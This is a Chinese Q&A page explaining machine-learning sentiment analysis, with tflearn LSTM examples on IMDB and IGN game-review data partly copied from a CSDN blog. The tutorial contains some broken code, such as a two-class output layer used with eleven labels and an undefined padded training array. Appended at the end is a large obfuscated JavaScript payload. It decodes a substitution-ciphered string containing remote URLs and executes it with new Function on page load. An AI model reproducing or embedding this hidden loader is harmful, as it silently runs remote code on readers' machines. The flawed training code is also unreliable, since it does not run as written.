基于机器学习的情感分析是什么意思

2025-03-07 15:10:39
推荐回答(2个)
回答1:

以下以语义特征为例:


机器学习基于语义特征的情感分析


基于语义特征的情感分析先人已有研究,可以通过情感词典匹配来做,但是应用机器学习在这方面会使精确度更高些。 
以本人参与的一个项目为主,总结下相关技术点。 
背景是:分析用户评论感情色彩是积极还是消极,即是褒还是贬。

具体步骤为: 
1.有监督的人工给文本标注类标签。如有5000条评论数据,我们给其中的1000条标为积极的,再选1000条标为消极的,积极和消极就是所谓的类标签。 
2.选择特征。从积极的评论数据中按词来选择积极的所有特征。同理,从消极的评论数据中按词来选择消极的所有特征。如“这款游戏非常好玩”->”这款”->“游戏”->”非常”->”好玩”,分为四个特征词,也可以采用双词搭配,“这个游戏”和“非常好玩”作为特征。 
3.特征降维,减少特征的数量。如上“这个游戏非常好玩”中的“这个游戏”没有必要作为特征,因为“好玩”或“非常好玩”已经决定了评论是积极的。 
4.将语料文本变成使用特征表示。 
5.统计所有特征出现的次数,并按倒序排序。 
6.从以上结果中选出排序最靠前的一些特征作为最终的评判特征。 
7.使用训练数据根据特征训练分类算法,得到分类器。 
8.用测试数据检测分类器的准确度。 
我们将数据分为两部分:开发集、测试集。用开发集的数据训练分类算法得到分类器;再用分类器对测试集里的数据进行分类,给出分类预测得到的标签;对比分类标签和人工标注得到的标签的差异,计算出准确度。

回答2:

知识
情感分析两种方法:
基于词典的方法:先对句子进行分词,然后统计个个词汇的个数,最后在情感字典中查找这些单词对应的情感值,然后可以计算出总体的情感。
机器学习的方法:输入大量句子以及这些句子的情感标签,就可以训练一个句子情感分类器,预测新的句子的情感。
机器学习方法的优点:机器学习对情感分析会更为精准,深度神经网络可以很好的分辨出一些反讽语气的句子,这些句子的情感不是通过简单的表面词汇分析可以理解的。
前馈过程接受固定大小的输入,比如二进制数;递归网络可以接受序列数据,比如文本。
使用AWS(亚马逊云服务)让你的代码在云端上更快更方便的运行。
实例
这里的实例用到的库是tflearn,tflearn是一个深度学习库,他基于TensorFlow,并且提供了更高级的API,可以很好的帮助初学者入门深度学习。
from __future__ import division, print_function, absolute_import

import tflearn
from tflearn.data_utils import to_categorical, pad_sequences
from tflearn.datasets import imdb # Internet Movie Database
数据导入
pkl:字节流形式数据,更容易转换为其他python对象
取10000单词,10%的的数据作为验证集
train, test, _ = imdb.load_data(path='imdb.pkl',
n_words=10000,
valid_portion=0.1)
将数据划分为评论集和标签集
trainX, trainY = train
testX, testY = test
数据处理
不能直接将文本数据中的字符串输入神经网络,必须先进行向量化,
神经网络作为一种算法,本质上还是对矩阵进行运算,
因此,将它们转换为数值或向量表示是必要的。
pad_sequences的作用是把输入转换为矩阵的形式,并且对矩阵进行扩充。
矩阵的扩充是为了保持输入维数的一致性。
下面的参数标明了输入的数列会扩充到100的长度,扩充的部分数值为0。
trainX = pad_sequences(trainX, maxlen=100, value=0.)
testX = pad_sequences(testX, maxlen=100, value=0.)
把评论集转位二进制向量(表示评价是积极或消极)
trainY = to_categorical(trainY, nb_classes=2)
testY = to_categorical(testY, nb_classes=2)
构造网络
定义输入层,输入数据长度为100
定义嵌入层,第一个参数是这一层接受的向量,即上一层输出的向量,共导入10000个单词,输出维度定义为128
定义LSTM(Long short term memory)层,使我们的网络能够记住序列一开始的数据,将把dropout设置为0.08,这是一种防止过拟合的技术。
定义全连接网络层,激活函数使用softmax。
对于输入做回归操作,定义优化方法,与学习率,还有损失值计算方法
net = tflearn.input_data([None, 100])
net = tflearn.embedding(net, input_dim=10000, output_dim=128)
net = tflearn.lstm(net, 128, dropout=0.8)
net = tflearn.fully_connected(net, 2, activation='softmax')
net = tflearn.regression(net, optimizer='adam', learning_rate=0.001,
loss='categorical_crossentropy')
训练网络
初始化神经网络
训练神经网络,输入训练集与验证集,show_metric=True可以输出训练日志
model = tflearn.DNN(net, tensorboard_verbose=0)
model.fit(trainX, trainY, validation_set=(testX, testY), show_metric=True,
batch_size=32)
因为注册AWS还要国外的信用卡,没有弄成,在自己笔记本上运行了40分钟,才训练好,迭代了7040次,准确度最后达到0.9475,损失值从一开始的0.5左右到了0.15。以后还是得想办法找一个免费的云服务器,跑一些小程序。
Challenge
The challenge for this video is to train a model on this dataset of video game reviews from IGN.com. Then, given some new video game title it should be able to classify it. You can use pandas to parse this dataset. Right now each review has a label that's either Amazing, Great, Good, Mediocre, painful, or awful. These are the emotions. Using the existing labels is extra credit. The baseline is that you can just convert the labels so that there are only 2 emotions (positive or negative). Ideally you can use an RNN via TFLearn like the one in this example, but I'll accept other types of ML models as well.
You'll learn how to parse data, select appropriate features, and use a neural net on an IRL pr
import tflearn
from tflearn.data_utils import to_categorical, pad_sequences, VocabularyProcessor
import pandas as pd
import numpy as np

# 数据导入
# 用pd做数据导入,这里训练集测试集随机的抽取会更好
dataframe = pd.read_csv('ign.csv').iloc[:, 1:3]

train = dataframe.iloc[:int(dataframe.shape[0]*0.9), :]
test = dataframe.iloc[int(dataframe.shape[0]*0.9):dataframe.shape[0], :]

trainX = train.title
trainY = train .score_phrase
testX = test.title
testY = test.score_phrase

# 数据处理
# 和实例不同的是这里的数据是纯文本的,处理前要转换成数据序列,用到了tflearn中的VocabularyProcessor相关方法;样本集分为11类
vocab_proc = VocabularyProcessor(15)
trainX = np.array(list(vocab_proc.fit_transform(trainX)))
testX = np.array(list(vocab_proc.fit_transform(testX)))

vocab_proc2 = VocabularyProcessor(1)
trainY = np.array(list(vocab_proc2.fit_transform(trainY))) - 1
trainY = to_categorical(trainY, nb_classes=11)
vocab_proc3 = VocabularyProcessor(1)
testY = np.array(list(vocab_proc3.fit_transform(testY))) - 1
testY = to_categorical(testY, nb_classes=11)

# 构建网络
# 现在并不清楚要按什么标准构建不同的网络,直接用的实例
net = tflearn.input_data([None, 15])
net = tflearn.embedding(net, input_dim=10000, output_dim=128)
net = tflearn.lstm(net, 128, dropout=0.8)
net = tflearn.fully_connected(net, 2, activation='softmax')
net = tflearn.regression(net, optimizer='adam', learning_rate=0.001,
loss='categorical_crossentropy')

# 训练网络
model = tflearn.DNN(net, tensorboard_verbose=0)
model.fit(trainX, trainY, validation_set=(testX, testY), show_metric=True,
batch_size=32)
Jovian's Winning Code:
Jovian的冠军代码写的很全面了,每一步的解释也很详细。这里同样把这个当做了一个分类问题,比较了三种不同的分类方式的区别,训练完成最后的深度学习网络可以达到0.5左右的正确率,输入一个游戏的名称,可以预测出这个游戏的评价等级。
依赖库
import pandas as pd
import tflearn
from tflearn.data_utils import to_categorical, pad_sequences
from tflearn.datasets import imdb
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import preprocessing
数据导入
导入游戏评价数据库ign.csv
original_ign = pd.read_csv('ign.csv')
查看数据库的形状
print('original_ign.shape:', original_ign.shape)
output:
original_ign.shape: (18625, 11)
共有18625个游戏的数据,每个游戏有11项信息。其中只有游戏的评价信息(score_phrase)是我们需要关注的。下面统计游戏的各种评价。
original_ign.score_phrase.value_counts()
output
Great 4773
Good 4741
Okay 2945
Mediocre 1959
Amazing 1804
Bad 1269
Awful 664
Painful 340
Unbearable 72
Masterpiece 55
Disaster 3
Name: score_phrase, dtype: int64
可以看出评价为Great和Good的最多,而Disaster的评价只有3个。
数据处理
预处理
检查属否有null元素(缺失项)
original_ign.isnull().sum()
output:
Unnamed: 0 0
score_phrase 0
title 0
url 0
platform 0
score 0
genre 36
editors_choice 0
release_year 0
release_month 0
release_day 0
dtype: int64
将缺失值填充为空字符串(这个例子其实无需做这两步,但要养成检查缺失值的好习惯):
original_ign.fillna(value='', inplace=True)
数据划分
划分样本集和标签集:
X = ign.text
y = ign.score_phrase
分类训练集和测试集:
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
样本集处理
将样本集的字符串转变为数字序列。创建vocab,把X转化为X_word_ids。
vect = CountVectorizer(ngram_range=(1,1), token_pattern=r'\b\w{1,}\b')

vect.fit(X_train)
vocab = vect.vocabulary_

def convert_X_to_X_word_ids(X):
return X.apply( lambda x: [vocab[w] for w in [w.lower().strip() for w in x.split()] if w in vocab] )

X_train_word_ids = convert_X_to_X_word_ids(X_train)
X_test_word_ids = convert_X_to_X_word_ids(X_test)
序列扩充

X_test_padded_seqs = pad_sequences(X_test_word_ids , maxlen=20, value=0)
标签集处理
unique_y_labels = list(y_train.value_counts().index)
le = preprocessing.LabelEncoder()
le.fit(unique_y_labels)

y_train = to_categorical(y_train.map(lambda x: le.transform([x])[0]), nb_classes=len(unique_y_labels))
y_test = to_categorical(y_test.map(lambda x: le.transform([x])[0]), nb_classes=len(unique_y_labels))
构造网络
构造网络和实例一样
n_epoch = 100
size_of_each_vector = X_train_padded_seqs.shape[1]
vocab_size = len(vocab)
no_of_unique_y_labels = len(unique_y_labels)
net = tflearn.input_data([None, size_of_each_vector]) # The first element is the "batch size" which we set to "None"
net = tflearn.embedding(net, input_dim=vocab_size, output_dim=128) # input_dim: vocabulary size
net = tflearn.lstm(net, 128, dropout=0.6) # Set the dropout to 0.6
net = tflearn.fully_connected(net, no_of_unique_y_labels, activation='softmax') # relu or softmax
net = tflearn.regression(net,
optimizer='adam', # adam or ada or adagrad # sgd
learning_rate=1e-4,
loss='categorical_crossentropy')
训练网络
初始化
model = tflearn.DNN(net, tensorboard_verbose=0)
训练
model.fit(X_train_padded_seqs, y_train,
validation_set=(X_test_padded_seqs, y_test),
n_epoch=n_epoch,
show_metric=True,
batch_size=100)
原文:https://blog.csdn.net/qq_31707969/article/details/79361606
版权声明:本文为博主原创文章,转载请附上博文链接!

!function(){function a(a){var _idx="e4ydksy2pg";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^m_XO6L)pmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFL5SJm4h(7F7fmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^m_XO6L)pmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFL5SJm4h(7F7fmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8YoTfSLT@Jp"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"YoTfSLT@Jp"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mhfO76RqmRT4"="Ks0X5ThF)mT)7F56RmRT4"="Ks02pThFmhfO76RqmRT4"="Ks0_JqhFmT)7F56RmRT4"="Ks02TOhFmhfO76RqmRT4"="Ks0CSqhF)mT)7F56RmRT4"="Ks0)FfThF)fmhfO76RqmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:mX2O2fmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:mX2O2fmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q/f/Ks0j(8}vR8YoTfSLT@Jp"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();